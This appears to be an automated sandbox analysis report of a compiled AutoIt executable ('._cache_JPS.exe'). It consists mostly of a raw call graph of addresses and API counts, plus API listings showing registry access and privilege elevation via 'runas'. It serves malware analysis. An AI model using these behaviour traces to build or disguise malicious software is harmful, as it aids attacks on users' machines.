50 API calls 104204->104205 104206 ae92ed gethostbyname 104205->104206 104207 ae931d _memmove 104206->104207 104208 ae92fa WSAGetLastError 104206->104208 104210 ae932d inet_ntoa 104207->104210 104209 ae930e 104208->104209 104211 a9ca8e 48 API calls 104209->104211 105621 aeadca 48 API calls 2 library calls 104210->105621 104213 ae931b Mailbox 104211->104213 104213->103815 104214 ae9342 105622 aeae5a 50 API calls 104214->105622 104216 ae934e 104217 a97bef 48 API calls 104216->104217 104217->104213 105623 aadd92 GetFileAttributesW 104218->105623 104222 aaf0b5 2 API calls 104221->104222 104223 aaf046 104222->104223 104223->103815 104225 a984a6 81 API calls 104224->104225 104226 af17c7 104225->104226 104227 ad6f5b 63 API calls 104226->104227 104228 af17d8 104227->104228 104228->103815 104230 ae015e 104229->104230 104231 ae0157 104229->104231 104232 a984a6 81 API calls 104230->104232 104233 a984a6 81 API calls 104231->104233 104232->104231 104234 ae017c 104233->104234 105628 ad76db GetFileVersionInfoSizeW 104234->105628 104236 ae018d 104237 ae0192 104236->104237 104239 ae01a3 _wcscmp 104236->104239 104238 a9ca8e 48 API calls 104237->104238 104241 ae01a1 104238->104241 104240 a9ca8e 48 API calls 104239->104240 104240->104241 104241->103815 105644 af23c5 104242->105644 104246 a984a6 81 API calls 104245->104246 104247 af10fb LoadLibraryW 104246->104247 104248 af111e 104247->104248 104249 af110f 104247->104249 104248->104249 105728 af28d9 48 API calls _memmove 104248->105728 104249->103815 105729 aef79f 104251->105729 104253 af0c0a 104253->103815 104255 ab010a 48 API calls 104254->104255 104256 a950b3 104255->104256 104257 a950ec CloseHandle 104256->104257 104258 a950be 104257->104258 104258->103815 105804 ae6b19 104259->105804 104262 ae80a5 104263 a93320 48 API calls 104262->104263 104264 ae80b3 104263->104264 105809 aa2320 50 API calls 104264->105809 104265 ae8102 104267 a9cdb4 48 API calls 104265->104267 104272 ae80f5 104265->104272 104269 ae812b 104267->104269 104268 
ae80cf 105810 aa2320 50 API calls 104268->105810 104271 a9cdb4 48 API calls 104269->104271 104269->104272 104271->104272 104272->103815 104274 a919ee 83 API calls 104273->104274 104275 af8062 104274->104275 104276 a91dce 107 API calls 104275->104276 104277 af806b 104276->104277 104278 af806f 104277->104278 104279 af8091 104277->104279 104282 a9ca8e 48 API calls 104278->104282 104280 a9d3d2 48 API calls 104279->104280 104281 af809a 104280->104281 105811 ace2e8 104281->105811 104286 af808f Mailbox 104282->104286 104284 af80aa 104285 a97bef 48 API calls 104284->104285 104285->104286 104286->103815 104288 aaf47f 104287->104288 104289 aaf48a 104287->104289 104290 a9cdb4 48 API calls 104288->104290 104293 a984a6 81 API calls 104289->104293 104314 aaf498 Mailbox 104289->104314 104290->104289 104291 ab010a 48 API calls 104292 aaf49f 104291->104292 104294 aaf4af 104292->104294 105836 a95080 49 API calls 104292->105836 104295 b06841 104293->104295 104299 a984a6 81 API calls 104294->104299 104296 ab297d __wsplitpath 47 API calls 104295->104296 104298 b06859 104296->104298 104300 a9caee 48 API calls 104298->104300 104301 aaf4bf 104299->104301 104302 b0686a 104300->104302 104303 a94bf9 56 API calls 104301->104303 105837 a939e8 48 API calls 2 library calls 104302->105837 104305 aaf4ce 104303->104305 104306 b068d4 GetLastError 104305->104306 104318 aaf4d6 104305->104318 104309 b068ed 104306->104309 104307 b06878 104308 b06895 104307->104308 105838 ad6f4b GetFileAttributesW FindFirstFileW FindClose 104307->105838 104310 a9cdb4 48 API calls 104308->104310 104309->104318 105839 a94592 CloseHandle 104309->105839 104310->104314 104311 b06920 104316 ab010a 48 API calls 104311->104316 104312 aaf4f0 104315 ab010a 48 API calls 104312->104315 104314->104291 104324 aaf50a Mailbox 104314->104324 104319 aaf4f5 104315->104319 104320 b06925 104316->104320 104317 b06888 104317->104308 104323 ad6d6d 52 API calls 104317->104323 104318->104311 104318->104312 104322 a9197e 48 API calls 
104319->104322 104322->104324 104323->104308 104324->103815 104326 a9ca8e 48 API calls 104325->104326 104327 aeb7a3 CoInitialize 104326->104327 104328 aeb7ae CoUninitialize 104327->104328 104329 aeb7b4 104327->104329 104328->104329 104330 aeb7d5 104329->104330 104332 a9ca8e 48 API calls 104329->104332 104331 aeb81b 104330->104331 104333 a984a6 81 API calls 104330->104333 104334 a984a6 81 API calls 104331->104334 104332->104330 104335 aeb7ef 104333->104335 104336 aeb827 104334->104336 105840 aca857 CLSIDFromProgID ProgIDFromCLSID lstrcmpiW CoTaskMemFree CLSIDFromString 104335->105840 104340 aeb9d3 SetErrorMode CoGetInstanceFromFile 104336->104340 104349 aeb861 104336->104349 104338 aeb802 104338->104331 104339 aeb807 104338->104339 105841 aec235 413 API calls Mailbox 104339->105841 104341 aeba1f CoGetObject 104340->104341 104342 aeba19 SetErrorMode 104340->104342 104341->104342 104346 aebaa8 104341->104346 104351 aeb9b1 104342->104351 104344 aeb8a8 GetRunningObjectTable 104347 aeb8b8 104344->104347 104348 aeb8cb 104344->104348 105846 aec235 413 API calls Mailbox 104346->105846 104347->104348 104365 aeb8ed 104347->104365 105842 aec235 413 API calls Mailbox 104348->105842 104349->104344 104357 a9cdb4 48 API calls 104349->104357 104363 aeb89a 104349->104363 104351->104346 104356 aeba53 104351->104356 104352 aebad0 VariantClear 104352->103815 104354 aeb814 Mailbox 104354->104352 104355 aebac2 SetErrorMode 104355->104354 104361 aeba6f 104356->104361 105844 acac4b 51 API calls Mailbox 104356->105844 104360 aeb88a 104357->104360 104362 a9cdb4 48 API calls 104360->104362 104360->104363 105845 ada6f6 103 API calls 104361->105845 104362->104363 104363->104344 104365->104351 105843 acac4b 51 API calls Mailbox 104365->105843 104366->103815 104368 a9cafd __wsetenvp _memmove 104367->104368 104369 ab010a 48 API calls 104368->104369 104370 a9cb3b 104369->104370 104370->103814 104371->103815 104372->103815 104373->103815 104374->103815 104375->103814 104376->103808 104377->103782 
104378->103786 104379->103796 104380->103802 104516 a9d3d2 104381->104516 104383 aef389 Mailbox 104384 aef3a9 104383->104384 104386 aef3cd 104383->104386 104387 aef3e1 104383->104387 104385 a9d89e 50 API calls 104384->104385 104401 aef421 Mailbox 104385->104401 104527 a97e53 104386->104527 104389 a9c935 48 API calls 104387->104389 104390 aef3df 104389->104390 104391 aef429 104390->104391 104536 aecdb5 413 API calls 104390->104536 104521 aecd12 104391->104521 104394 aef410 104394->104391 104396 aef414 104394->104396 104395 aef44b 104398 aef457 104395->104398 104399 aef4a2 104395->104399 104537 add338 86 API calls 4 library calls 104396->104537 104398->104384 104402 aef476 104398->104402 104400 aef34f 413 API calls 104399->104400 104400->104401 104401->104009 104403 a9ca8e 48 API calls 104402->104403 104403->104401 104404->103957 104406 a93444 104405->104406 104407 a93435 104405->104407 104406->103989 104408 ab010a 48 API calls 104407->104408 104408->104406 104409->103989 104410->104011 104411->103989 104412->103958 104413->104011 104414->104011 104415->103971 104416->104005 104418 aa469f 104417->104418 104419 aa4537 104417->104419 104422 a9caee 48 API calls 104418->104422 104420 b07820 104419->104420 104421 aa4543 104419->104421 104786 aee713 413 API calls Mailbox 104420->104786 104614 aa4040 104421->104614 104429 aa45e4 Mailbox 104422->104429 104425 b0782c 104426 aa4639 Mailbox 104425->104426 104787 add520 86 API calls 4 library calls 104425->104787 104426->104009 104428 aa4559 104428->104425 104428->104426 104428->104429 104436 af1f19 132 API calls 104429->104436 104629 ae9500 104429->104629 104638 ae1080 104429->104638 104641 ae95af WSAStartup 104429->104641 104643 ae6fc3 104429->104643 104646 aaf55e 104429->104646 104655 a950ec 104429->104655 104659 af352a 104429->104659 104747 addce9 104429->104747 104752 adefcd 104429->104752 104436->104426 104440->104000 104441->104007 104442->104012 105336 a9a9a0 104443->105336 104445 aa36e7 104446 aa3778 104445->104446 
104447 b0a269 104445->104447 104509 aa3aa8 104445->104509 105348 aabc04 86 API calls 104446->105348 105353 add520 86 API calls 4 library calls 104447->105353 104448 aa3ab5 Mailbox 104448->104009 104452 b0a68d 104452->104509 105368 add520 86 API calls 4 library calls 104452->105368 104454 aa3793 104454->104452 104474 aa396b Mailbox _memmove 104454->104474 104454->104509 105341 a910e8 104454->105341 104455 aabc5c 48 API calls 104455->104474 104459 b0a45c 105362 add520 86 API calls 4 library calls 104459->105362 104460 b0a583 104464 a9fa40 413 API calls 104460->104464 104461 b0a289 104462 a9d2d2 53 API calls 104461->104462 104502 b0a3e9 104461->104502 104465 b0a2fb 104462->104465 104466 b0a5b5 104464->104466 104467 b0a303 104465->104467 104468 b0a40f 104465->104468 104478 a9d380 55 API calls 104466->104478 104466->104509 104482 b0a317 104467->104482 104493 b0a341 104467->104493 105359 aacf79 49 API calls 104468->105359 104470 aa384e 104470->104474 104475 b0a60c 104470->104475 104476 aa38e5 104470->104476 104474->104455 104474->104459 104474->104460 104474->104461 104479 a9fa40 413 API calls 104474->104479 104484 b0a5e6 104474->104484 104494 aa399f 104474->104494 104496 a9d89e 50 API calls 104474->104496 104506 ab010a 48 API calls 104474->104506 104474->104509 105349 a9d500 53 API calls __cinit 104474->105349 105350 a9d420 53 API calls 104474->105350 105351 aabaef 48 API calls _memmove 104474->105351 105363 aed21a 82 API calls Mailbox 104474->105363 105364 ad89e0 53 API calls 104474->105364 105365 a9d772 55 API calls 104474->105365 105367 add231 50 API calls 104475->105367 104483 ab010a 48 API calls 104476->104483 104478->104484 104479->104474 104481 b0a42c 104485 b0a441 104481->104485 104486 b0a44d 104481->104486 105354 add520 86 API calls 4 library calls 104482->105354 105366 add520 86 API calls 4 library calls 104484->105366 104492 b0a384 104498 b0a37a 104492->104498 105356 aef4df 413 API calls 104492->105356 104493->104492 104495 b0a366 104493->104495 104503 a9c935 
48 API calls 104494->104503 104504 aa39c0 104494->104504 105355 aef211 413 API calls 104495->105355 104496->104474 104498->104509 105358 add520 86 API calls 4 library calls 104502->105358 104503->104504 104507 b0a65e 104504->104507 104504->104509 104511 aa3a05 104504->104511 104506->104474 104508 a9d89e 50 API calls 104507->104508 104508->104452 104509->104448 105352 add520 86 API calls 4 library calls 104509->105352 104510 aa3a95 104512 a9d89e 50 API calls 104510->104512 104511->104452 104511->104509 104511->104510 104512->104509 104513->104009 104514->103979 104515->103987 104517 ab010a 48 API calls 104516->104517 104518 a9d3f3 104517->104518 104519 ab010a 48 API calls 104518->104519 104520 a9d401 104519->104520 104520->104383 104522 aecd46 104521->104522 104523 aecd21 104521->104523 104522->104395 104524 a9ca8e 48 API calls 104523->104524 104525 aecd2d 104524->104525 104538 aec8b7 104525->104538 104528 a97ecf 104527->104528 104529 a97e5f __wsetenvp 104527->104529 104606 a9a2fb 104528->104606 104531 a97e7b 104529->104531 104532 a97ec7 104529->104532 104602 a9a6f8 104531->104602 104605 a97eda 48 API calls 104532->104605 104535 a97e85 _memmove 104535->104390 104536->104394 104537->104401 104540 aec914 104538->104540 104541 aec8f7 104538->104541 104596 aec235 413 API calls Mailbox 104540->104596 104541->104540 104542 aecc61 104541->104542 104543 aec934 104541->104543 104544 aecc6e 104542->104544 104545 aecca9 104542->104545 104543->104540 104574 acabf3 104543->104574 104592 aad6b4 48 API calls 104544->104592 104545->104540 104548 aeccb6 104545->104548 104547 aec964 104547->104540 104549 aec973 104547->104549 104594 aad6b4 48 API calls 104548->104594 104561 aec9a1 104549->104561 104578 aca8c8 104549->104578 104551 aecc87 104593 ad97b6 89 API calls 104551->104593 104555 aeccd6 104595 ad503c 91 API calls Mailbox 104555->104595 104557 aecadc VariantInit 104564 aecb11 _memset 104557->104564 104560 aeca4a 104560->104557 104562 aeca86 VariantClear 104560->104562 
104561->104560 104588 aca25b 106 API calls 104561->104588 104562->104560 104563 aecaa5 SysAllocString 104562->104563 104563->104560 104571 aecc52 104571->104522 104575 acac04 __wsetenvp 104574->104575 104577 acac16 104574->104577 104575->104577 104597 a93bcf 104575->104597 104577->104547 104580 aca8f2 104578->104580 104579 aca9ed SysFreeString 104587 aca9f9 104579->104587 104580->104579 104581 aca90a 104580->104581 104582 acaa7e 104580->104582 104580->104587 104581->104561 104582->104581 104583 acaad9 SysFreeString 104582->104583 104584 acaac9 lstrcmpiW 104582->104584 104582->104587 104583->104582 104584->104583 104587->104581 104601 aca78a RaiseException 104587->104601 104588->104561 104592->104551 104593->104571 104594->104555 104595->104571 104596->104571 104598 a93bd9 __wsetenvp 104597->104598 104599 ab010a 48 API calls 104598->104599 104600 a93bee _wcscpy 104599->104600 104600->104577 104601->104587 104603 ab010a 48 API calls 104602->104603 104604 a9a702 104603->104604 104604->104535 104605->104535 104607 a9a309 104606->104607 104609 a9a321 _memmove 104606->104609 104607->104609 104610 a9b8a7 104607->104610 104609->104535 104611 a9b8ba 104610->104611 104612 a9b8b7 _memmove 104610->104612 104613 ab010a 48 API calls 104611->104613 104612->104609 104613->104612 104615 b0787b 104614->104615 104618 aa406c 104614->104618 104789 add520 86 API calls 4 library calls 104615->104789 104617 b0788c 104790 add520 86 API calls 4 library calls 104617->104790 104618->104617 104626 aa40a6 _memmove 104618->104626 104620 aa4175 104625 aa4185 104620->104625 104788 aed21a 82 API calls Mailbox 104620->104788 104622 aa41f1 104622->104428 104623 ab010a 48 API calls 104623->104626 104624 a9fa40 413 API calls 104624->104626 104625->104428 104626->104620 104626->104623 104626->104624 104626->104625 104627 b078d8 104626->104627 104791 add520 86 API calls 4 library calls 104627->104791 104630 a9cdb4 48 API calls 104629->104630 104631 ae9515 104630->104631 104792 adbe47 104631->104792 
API calls 4 library calls 107136->107208 107139 aa0119 107211 add520 86 API calls 4 library calls 107139->107211 107140 aa105e 107147 a9c935 48 API calls 107140->107147 107141 ab010a 48 API calls 107141->107171 107142 aa0dee 107145 a9d89e 50 API calls 107142->107145 107144 aa0dfa 107151 a9d89e 50 API calls 107144->107151 107145->107144 107146 b0b772 107212 add520 86 API calls 4 library calls 107146->107212 107164 a9fbf1 Mailbox 107147->107164 107148 aa1063 107210 add520 86 API calls 4 library calls 107148->107210 107149 a9f6d0 413 API calls 107149->107171 107150 a9c935 48 API calls 107150->107171 107154 aa0e83 107151->107154 107153 aca599 InterlockedDecrement 107153->107171 107159 a9caee 48 API calls 107154->107159 107155 a9d3d2 48 API calls 107155->107171 107157 b0b7d2 107158 ab1b2a 52 API calls __cinit 107158->107171 107170 aa10f1 Mailbox 107159->107170 107162 aa1230 107162->107164 107209 add520 86 API calls 4 library calls 107162->107209 107165 a9fa40 413 API calls 107165->107171 107168 b0b583 107206 add520 86 API calls 4 library calls 107168->107206 107207 add520 86 API calls 4 library calls 107170->107207 107171->107139 107171->107140 107171->107141 107171->107142 107171->107144 107171->107146 107171->107148 107171->107149 107171->107150 107171->107153 107171->107154 107171->107155 107171->107158 107171->107162 107171->107164 107171->107165 107171->107168 107171->107170 107172 af804e 113 API calls 107171->107172 107173 af798d 109 API calls 107171->107173 107174 af30ad 93 API calls 107171->107174 107175 aeb74b 413 API calls 107171->107175 107176 af17aa 87 API calls 107171->107176 107177 aaef0d 94 API calls 107171->107177 107178 a950a3 49 API calls 107171->107178 107179 af10e5 82 API calls 107171->107179 107180 aaf461 98 API calls 107171->107180 107181 ae8065 55 API calls 107171->107181 107182 ae9122 91 API calls 107171->107182 107183 ae92c0 88 API calls 107171->107183 107184 aadd84 3 API calls 107171->107184 107185 a981c6 85 API calls 107171->107185 107186 
ae013f 87 API calls 107171->107186 107187 aaf03e 2 API calls 107171->107187 107188 af0bfa 129 API calls 107171->107188 107189 af1f19 132 API calls 107171->107189 107199 aa1620 59 API calls Mailbox 107171->107199 107200 aeee52 82 API calls 2 library calls 107171->107200 107201 aeef9d 90 API calls Mailbox 107171->107201 107202 adb020 48 API calls 107171->107202 107203 aee713 413 API calls Mailbox 107171->107203 107172->107171 107173->107171 107174->107171 107175->107171 107176->107171 107177->107171 107178->107171 107179->107171 107180->107171 107181->107171 107182->107171 107183->107171 107184->107171 107185->107171 107186->107171 107187->107171 107188->107171 107189->107171 107191 aae022 107190->107191 107192 aae034 107190->107192 107193 a9d89e 50 API calls 107191->107193 107194 aae03a 107192->107194 107195 aae063 107192->107195 107198 aae02c 107193->107198 107197 ab010a 48 API calls 107194->107197 107196 a9d89e 50 API calls 107195->107196 107196->107198 107197->107198 107198->107127 107199->107171 107200->107171 107201->107171 107202->107171 107203->107171 107204->107133 107205->107136 107206->107170 107207->107164 107208->107134 107209->107148 107210->107139 107211->107146 107212->107157 107213 b0bc25 107214 b0bc27 107213->107214 107217 ad79f8 SHGetFolderPathW 107214->107217 107216 b0bc30 107216->107216 107218 a97e53 48 API calls 107217->107218 107219 ad7a25 107218->107219 107219->107216 107220 b0c146 GetUserNameW 107221 b01eca 107226 aabe17 107221->107226 107225 b01ed9 107227 a9d3d2 48 API calls 107226->107227 107228 aabe85 107227->107228 107234 aac929 107228->107234 107230 aabf22 107232 aabf3e 107230->107232 107237 aac8b7 48 API calls _memmove 107230->107237 107233 ab1b2a 52 API calls __cinit 107232->107233 107233->107225 107238 aac955 107234->107238 107237->107230 107239 aac948 107238->107239 107240 aac962 107238->107240 107239->107230 107240->107239 107241 aac969 RegOpenKeyExW 107240->107241 107241->107239 107242 aac983 RegQueryValueExW 107241->107242 107243 
aac9b9 RegCloseKey 107242->107243 107244 aac9a4 107242->107244 107243->107239 107244->107243 107245 b01e8b 107250 aae44f 107245->107250 107249 b01e9a 107251 ab010a 48 API calls 107250->107251 107252 aae457 107251->107252 107254 aae46b 107252->107254 107258 aae74b 107252->107258 107257 ab1b2a 52 API calls __cinit 107254->107257 107257->107249 107259 aae463 107258->107259 107260 aae754 107258->107260 107262 aae47b 107259->107262 107290 ab1b2a 52 API calls __cinit 107260->107290 107263 a9d3d2 48 API calls 107262->107263 107264 aae492 GetVersionExW 107263->107264 107265 a97e53 48 API calls 107264->107265 107266 aae4d5 107265->107266 107291 aae5f8 107266->107291 107269 aae617 48 API calls 107270 aae4e9 107269->107270 107272 b029f9 107270->107272 107295 aae6d1 107270->107295 107274 aae55f GetCurrentProcess 107304 aae70e LoadLibraryA GetProcAddress 107274->107304 107275 aae576 107276 aae59e 107275->107276 107277 aae5ec GetSystemInfo 107275->107277 107298 aae694 107276->107298 107279 aae5c9 107277->107279 107282 aae5dc 107279->107282 107283 aae5d7 FreeLibrary 107279->107283 107282->107254 107283->107282 107284 aae5e4 GetSystemInfo 107286 aae5be 107284->107286 107285 aae5b4 107301 aae437 107285->107301 107286->107279 107289 aae5c4 FreeLibrary 107286->107289 107289->107279 107290->107259 107292 aae601 107291->107292 107293 a9a2fb 48 API calls 107292->107293 107294 aae4dd 107293->107294 107294->107269 107305 aae6e3 107295->107305 107309 aae6a6 107298->107309 107302 aae694 2 API calls 107301->107302 107303 aae43f GetNativeSystemInfo 107302->107303 107303->107286 107304->107275 107306 aae55b 107305->107306 107307 aae6ec LoadLibraryA 107305->107307 107306->107274 107306->107275 107307->107306 107308 aae6fd GetProcAddress 107307->107308 107308->107306 107310 aae5ac 107309->107310 107311 aae6af LoadLibraryA 107309->107311 107310->107284 107310->107285 107311->107310 107312 aae6c0 GetProcAddress 107311->107312 107312->107310 107313 b01eed 107318 aae975 107313->107318 107315 b01f01 
107334 ab1b2a 52 API calls __cinit 107315->107334 107317 b01f0b 107319 ab010a 48 API calls 107318->107319 107320 aaea27 GetModuleFileNameW 107319->107320 107321 ab297d __wsplitpath 47 API calls 107320->107321 107322 aaea5b _wcsncat 107321->107322 107335 ab2bff 107322->107335 107325 ab010a 48 API calls 107326 aaea94 _wcscpy 107325->107326 107327 a9d3d2 48 API calls 107326->107327 107328 aaeacf 107327->107328 107338 aaeb05 107328->107338 107330 aaeae0 Mailbox 107330->107315 107331 aaeada _wcscat __wsetenvp _wcsncpy 107331->107330 107332 a9a4f6 48 API calls 107331->107332 107333 ab010a 48 API calls 107331->107333 107332->107331 107333->107331 107334->107317 107352 abaab9 107335->107352 107339 a9c4cd 48 API calls 107338->107339 107340 aaeb14 RegOpenKeyExW 107339->107340 107341 b04b17 RegQueryValueExW 107340->107341 107342 aaeb35 107340->107342 107343 b04b30 107341->107343 107344 b04b91 RegCloseKey 107341->107344 107342->107331 107345 ab010a 48 API calls 107343->107345 107346 b04b49 107345->107346 107347 a94bce 48 API calls 107346->107347 107348 b04b53 RegQueryValueExW 107347->107348 107349 b04b86 107348->107349 107350 b04b6f 107348->107350 107349->107344 107351 a97e53 48 API calls 107350->107351 107351->107349 107353 abaaca 107352->107353 107354 ababc6 107352->107354 107353->107354 107357 abaad5 107353->107357 107362 ab889e 47 API calls __getptd_noexit 107354->107362 107358 aaea8a 107357->107358 107361 ab889e 47 API calls __getptd_noexit 107357->107361 107358->107325 107360 ababbb 107363 ab7aa0 8 API calls __strnicmp_l 107360->107363 107361->107360 107362->107360 107363->107358 107364 aa0ff7 107365 aae016 50 API calls 107364->107365 107366 aa100d 107365->107366 107421 aae08f 107366->107421 107370 a9fbf1 Mailbox 107372 aa105e 107380 a9c935 48 API calls 107372->107380 107373 aa0dee 107377 a9d89e 50 API calls 107373->107377 107374 a9c935 48 API calls 107385 a9fad8 Mailbox _memmove 107374->107385 107376 aa1063 107441 add520 86 API calls 4 library calls 107376->107441 
107386 aa0dfa 107377->107386 107378 b0b772 107443 add520 86 API calls 4 library calls 107378->107443 107379 aa0119 107442 add520 86 API calls 4 library calls 107379->107442 107380->107370 107381 a9f6d0 413 API calls 107381->107385 107382 a9d89e 50 API calls 107389 aa0e83 107382->107389 107383 aca599 InterlockedDecrement 107383->107385 107384 a9d3d2 48 API calls 107384->107385 107385->107370 107385->107372 107385->107373 107385->107374 107385->107376 107385->107378 107385->107379 107385->107381 107385->107383 107385->107384 107385->107386 107385->107389 107392 ab1b2a 52 API calls __cinit 107385->107392 107395 aa103d 107385->107395 107396 ab010a 48 API calls 107385->107396 107397 a9fa40 413 API calls 107385->107397 107400 b0b583 107385->107400 107402 aa10f1 Mailbox 107385->107402 107403 af804e 113 API calls 107385->107403 107404 af798d 109 API calls 107385->107404 107405 af30ad 93 API calls 107385->107405 107406 aeb74b 413 API calls 107385->107406 107407 af17aa 87 API calls 107385->107407 107408 aaef0d 94 API calls 107385->107408 107409 a950a3 49 API calls 107385->107409 107410 af10e5 82 API calls 107385->107410 107411 aaf461 98 API calls 107385->107411 107412 ae8065 55 API calls 107385->107412 107413 ae9122 91 API calls 107385->107413 107414 ae92c0 88 API calls 107385->107414 107415 aadd84 3 API calls 107385->107415 107416 a981c6 85 API calls 107385->107416 107417 ae013f 87 API calls 107385->107417 107418 aaf03e 2 API calls 107385->107418 107419 af0bfa 129 API calls 107385->107419 107420 af1f19 132 API calls 107385->107420 107433 aa1620 59 API calls Mailbox 107385->107433 107434 aeee52 82 API calls 2 library calls 107385->107434 107435 aeef9d 90 API calls Mailbox 107385->107435 107436 adb020 48 API calls 107385->107436 107437 aee713 413 API calls Mailbox 107385->107437 107386->107382 107388 b0b7d2 107390 a9caee 48 API calls 107389->107390 107390->107402 107392->107385 107395->107370 107440 add520 86 API calls 4 library calls 107395->107440 107396->107385 
107397->107385 107438 add520 86 API calls 4 library calls 107400->107438 107439 add520 86 API calls 4 library calls 107402->107439 107403->107385 107404->107385 107405->107385 107406->107385 107407->107385 107408->107385 107409->107385 107410->107385 107411->107385 107412->107385 107413->107385 107414->107385 107415->107385 107416->107385 107417->107385 107418->107385 107419->107385 107420->107385 107422 a97b6e 48 API calls 107421->107422 107423 aae0b4 _wcscmp 107422->107423 107424 a9caee 48 API calls 107423->107424 107426 aae0e2 Mailbox 107423->107426 107425 b0b9c7 107424->107425 107444 a97b4b 48 API calls Mailbox 107425->107444 107426->107385 107428 b0b9d5 107429 a9d2d2 53 API calls 107428->107429 107430 b0b9e7 107429->107430 107431 a9d89e 50 API calls 107430->107431 107432 b0b9ec Mailbox 107430->107432 107431->107432 107432->107385 107433->107385 107434->107385 107435->107385 107436->107385 107437->107385 107438->107402 107439->107370 107440->107376 107441->107379 107442->107378 107443->107388 107444->107428

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                                                                                                                                                          • Part of subcall function 00A94257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00000000,00000001,00000000), ref: 00A9428C
                                                                                                                                                        • IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                                                                                                                                                        • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00B51120,C:\Users\user\Desktop\._cache_JPS.exe,00B51124,?,?), ref: 00A937EE
                                                                                                                                                          • Part of subcall function 00A934F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00A9352A
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                                                                                                                                                        • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00B42934,00000010), ref: 00B021C5
                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?), ref: 00B021FD
                                                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 00B02232
                                                                                                                                                        • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00B2DAA4), ref: 00B02290
                                                                                                                                                        • ShellExecuteW.SHELL32(00000000), ref: 00B02297
                                                                                                                                                          • Part of subcall function 00A930A5: GetSysColorBrush.USER32(0000000F), ref: 00A930B0
                                                                                                                                                          • Part of subcall function 00A930A5: LoadCursorW.USER32(00000000,00007F00), ref: 00A930BF
                                                                                                                                                          • Part of subcall function 00A930A5: LoadIconW.USER32(00000063), ref: 00A930D5
                                                                                                                                                          • Part of subcall function 00A930A5: LoadIconW.USER32(000000A4), ref: 00A930E7
                                                                                                                                                          • Part of subcall function 00A930A5: LoadIconW.USER32(000000A2), ref: 00A930F9
                                                                                                                                                          • Part of subcall function 00A930A5: RegisterClassExW.USER32(?), ref: 00A93167
                                                                                                                                                          • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00A92ECB
                                                                                                                                                          • Part of subcall function 00A92E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A92EEC
                                                                                                                                                          • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F00
                                                                                                                                                          • Part of subcall function 00A92E9D: ShowWindow.USER32(00000000), ref: 00A92F09
                                                                                                                                                          • Part of subcall function 00A93598: _memset.LIBCMT ref: 00A935BE
                                                                                                                                                          • Part of subcall function 00A93598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A93667
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                                                                                        • String ID: C:\Users\user\Desktop\._cache_JPS.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                                                        • API String ID: 4253510256-789825793
                                                                                                                                                        • Opcode ID: 1ef1c972a3fa488873e00c602a454ac9a08bb8853a8de4f9be3c8110620894fa
                                                                                                                                                        • Instruction ID: a566485c35d7429f6abf8195b819dc02a4376ab642982591066834501f19de18
                                                                                                                                                        • Opcode Fuzzy Hash: 1ef1c972a3fa488873e00c602a454ac9a08bb8853a8de4f9be3c8110620894fa
                                                                                                                                                        • Instruction Fuzzy Hash: 69512676744244BACF10ABA4EC46FED3BF89B09711F0084E6FB51A31E1CE704A49CB62

                                                                                                                                                        Control-flow Graph

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AF3AF7: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00AF2AA6,?,?), ref: 00AF3B0E
                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00AF317F
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?), ref: 00AF321E
                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00AF32B6
                                                                                                                                                        • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00AF34F5
                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00AF3502
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1240663315-0

                                                                                                                                                        APIs
                                                                                                                                                        • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00A92A33
                                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00A92A5D
                                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A92A80
